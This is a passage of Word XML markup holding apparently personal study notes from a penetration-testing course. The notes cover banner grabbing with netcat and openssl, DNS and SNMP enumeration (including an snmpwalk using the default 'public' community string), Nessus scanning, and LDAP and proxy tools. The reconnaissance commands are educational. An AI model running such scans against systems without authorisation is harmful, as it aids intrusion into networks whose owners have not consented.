        <w:t>-- connect to</w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mail server on port 25 (SMTP) Can provide what system is in use and what version numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00230E9E" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> mx sendmail.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00230E9E" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -v services.sendmail.com 25</w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00230E9E">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00230E9E">
        <w:t xml:space="preserve"> to connect to services.sendmail.com on port 25.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>s_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -connect www.infiniteskills.com:443</w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- connects to port 443 (SSL) to the website. Shows all the SSL, TLSv1, and cipher information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Vulnerability scanning </w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NESSUS</w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:t xml:space="preserve"> Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scan for open ports, banner grab, try and figure out what versions are running, they also check OS, check what services are available, and what version they are running. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nexpose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Community Version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a good free version but can only scan up to 32 IPs. </w:t>
      </w:r>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> offers free feed but not for commercial purposes. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>QualysGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>good but costly</w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:t xml:space="preserve"> option</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability scanner</w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can create False Positives and also False Negatives as it is easy to spoof banners or even hide them. They kind of make a best guess to try and determine if there is a vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00230E9E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The results of the vulnerability scanner need to be properly analysed to</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> quantify the results and to see if there is any vulner</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t>ability worth trying to exploit or patch. Whatever the case may be.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Are the severity ones you agree with or not? Have to look at the big picture sometimes.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve"> Depends on the scope of the pen test. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Using Nessus for vulnerability scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Runs from a web interface. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Policies - build a policy to scan against a syste</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t>m. C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reate new ones to add to the 4 default. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>safechecks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - don't do anything that might crash a system</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Woh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, there are loads of things to configure when you set up your own policy. Can get lost in</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the config</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>uration</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Results are ordered by severity. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t>plugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> id and box on right will show further information. This can point towards things that require further investigation. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Enumeration techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED2B70" w:rsidRDefault="00ED2B70" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Enumeration -</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2B70">
        <w:t xml:space="preserve"> the action of establishing the number of something.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED2B70" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ways of getting information from systems. Banner grabbing is a classic</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Can </w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve">also use Telnet or </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DNS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>See if possible to do DNS Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> @ns1.dnsmadeeasy.com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>version.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> txt chaos</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- try and fi</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>d out what version of bind is being used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> view</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- used in windows. Might provide the DC info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> help</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- have a read of the help manual</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4114" w:rsidRPr="00BF4114" w:rsidRDefault="00BF4114" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF4114">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>enum4linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>- Enumeration tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**S</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve">imple </w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve">etwork </w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve">anagement </w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t>rotocol – SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>V3 is the only secure version now that uses authentication however, V1 is the most commonly found in the real world. Has no encryption and lo</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t>ts of people haven't changed it due to the hassle/cost of updating to new version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Possible to set some simple config</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>uration parame</w:t>
      </w:r>
      <w:r>
        <w:t>ters using SNMP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Community Strings were used in V1, (Public &amp; Private) very simple and easy to hack. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED2B70" w:rsidRDefault="00ED2B70" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Walk through the MIB - Management Information Base</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00ED2B70" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -v 1 -c public 192.168.1.39</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED2B70" w:rsidRDefault="00ED2B70" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>So many companies have not bothered updating SNMP to a new version as v1 works and they're not bothered.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>There is a GUI version available</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve"> although as normal learn to use the Terminal version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Provides so much good information about a system that can then be investigated for vulnerabilities. Can drop down and look in to network devices. A gold mine of information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**L</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve">ightweight </w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve">irectory </w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t xml:space="preserve">ccess </w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t>rotocol - LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Big thing that </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>LDAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>servers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> do is a way of storing user, system, </w:t>
      </w:r>
      <w:r w:rsidR="00ED2B70">
        <w:t>and printer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Active Directory is a version of LDAP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>JXplorer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can connect to a server running LDAP. Port 389. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00ED2B70" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Possible to</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> select what kind of log on you want to do: Anon, SSL + Anon, SSL + Password etc...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LdapMiner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a command line Windows version. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00ED2B70" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ldapminer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED2B70">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -h 192.168.1.22 -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows running AD are good targets but there are other type of LDAP servers. Really good way of organising data about people or resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Using Proxies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00ED2B70" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Proxies s</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>it in</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>between the host and destination. Used to cache webpages to save on bandwidth in a lot of organisations. Another good reason to use a proxy server is to allow admin to block access to certain websites. Configure on the proxy to block access to websites. Can also use them to insert an AV option in the middle of the web stream.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>(Might need to configure web browser</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to use proxy) Other purpose might be to intercept requests to see what is happening between the client and the webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>There is a possibility to use one for banner grabbing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can see different things that are going on under the hood, other </w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> connections from your webpage. A lot of web activity going on in the background. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0042501E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Z attack Proxy from OWASP</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0042501E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>BlueCoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0042501E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Proxy</w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="0042501E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Squid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:t xml:space="preserve">good </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">options. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4114" w:rsidRDefault="00BF4114" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Proxy Chains - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
